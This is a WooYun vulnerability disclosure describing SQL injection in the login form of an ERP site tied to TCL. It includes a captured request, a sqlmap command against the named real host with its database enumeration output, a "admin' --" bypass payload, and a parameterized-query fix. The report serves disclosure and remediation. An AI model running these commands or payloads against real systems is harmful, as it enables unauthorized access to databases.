
Vulnerability summary

Defect ID: wooyun-2013-043253

Title: TCL # SQL injection vulnerability in an ERP system

Vendor: TCL official online store

Author: Mr.leo

Submitted: 2013-11-18 16:11

Fixed: 2014-01-02 16:11

Published: 2014-01-02 16:11

Type: SQL injection vulnerability

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2013-11-18: Details sent to the vendor, awaiting vendor handling
2013-11-18: Vendor confirmed; details visible to the vendor only
2013-11-28: Details disclosed to core white hats and domain experts
2013-12-08: Details disclosed to regular white hats
2013-12-18: Details disclosed to intern white hats
2014-01-02: Details disclosed to the public

Summary:

TCL # SQL injection vulnerability in an ERP system (599 tables)

Details:

1. Affected site:
http://tclkt.etoway.cn/
2. Affected URL:
http://tclkt.etoway.cn/web/SubmitLogin.do
3. The username field is not filtered, which leads to an injection vulnerability. The login request as captured:
POST http://tclkt.etoway.cn/web/SubmitLogin.do HTTP/1.1
Host: tclkt.etoway.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://tclkt.etoway.cn/web/SubmitLogin.do
Cookie: CPCUserName=11; ch1=true; ch2=false; entcode=2; lastloginuser=11; JSESSIONID=FB8VSJtpztKSCJSM3LQBQ21Tt1JzDGB9GhzQ2sMs02bBJ6KvxgsG!740692211
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
value%28userName%29=11&value%28password%29=12&value%28entcode1%29=2&value%28entcode%29=2&Submit=%E7%99%BB+%E5%BD%95
4. Run sqlmap against the login parameter:
sqlmap.py -u "http://tclkt.etoway.cn/web/SubmitLogin.do" --data "value(userName)=1" --dbs --current-user --current-db

[Screenshots: 3389.png, 123456.png]


available databases [20]:
[*] AJEBS
[*] AJSERP
[*] BDBASE
[*] BDCRM
[*] BMS
[*] CRMTW
[*] DBSNMP
[*] FSBAPPS
[*] FSBCPC
[*] FSBGN
[*] OUTLN
[*] SERP
[*] SYS
[*] SYSTEM
[*] TCLXJD
[*] TSMSYS
[*] TWSALE
[*] TWSERP
[*] WMSYS
[*] YILIDA
The current database, TWSERP, contains 599 tables:
Database: TWSERP
[599 tables]
over

Proof of vulnerability:

The sqlmap database enumeration shown above (20 databases, including the Oracle default schemas SYS, SYSTEM, DBSNMP and OUTLN).

Fix:

Filter the input.
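The root cause is the username value being spliced into the SQL text of the login query. Filtering helps, but the durable fix is a parameterized query (in a Java application like this one, a JDBC PreparedStatement with ? placeholders). The following is an added illustration, not the ERP's code: a constructed sqlite3 table stands in for the real Oracle login table, and the vulnerable lookup is shown next to the parameterized one.

```python
import sqlite3


def make_db():
    # Constructed sample table standing in for the ERP's login table; not the real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login_user (username TEXT, password TEXT, entcode TEXT)")
    conn.execute("INSERT INTO login_user VALUES ('admin', 'S3cret!', '2')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password, entcode):
    # The pattern the report describes: form values spliced straight into the SQL text,
    # so a quote in the username ends the string literal and the rest is parsed as SQL.
    sql = (
        "SELECT username FROM login_user WHERE username = '%s' "
        "AND password = '%s' AND entcode = '%s'" % (username, password, entcode)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password, entcode):
    # Parameterized query: the statement text is fixed and the values travel separately,
    # so quotes, comment markers or keywords in the input are only ever compared as data.
    sql = (
        "SELECT username FROM login_user WHERE username = ? "
        "AND password = ? AND entcode = ?"
    )
    row = conn.execute(sql, (username, password, entcode)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # A username that closes the quote and comments out the password check
    # logs in through the vulnerable query but is rejected by the fixed one.
    crafted = "admin' --"
    print("vulnerable:", login_vulnerable(db, crafted, "wrong", "2"))
    print("fixed:     ", login_fixed(db, crafted, "wrong", "2"))
```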

Copyright notice: please credit the source when reposting: Mr.leo@WooYun


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-11-18 16:21

Vendor reply:

Thank you for your attention; this has been forwarded to the relevant unit for confirmation and handling.

Latest status:

None yet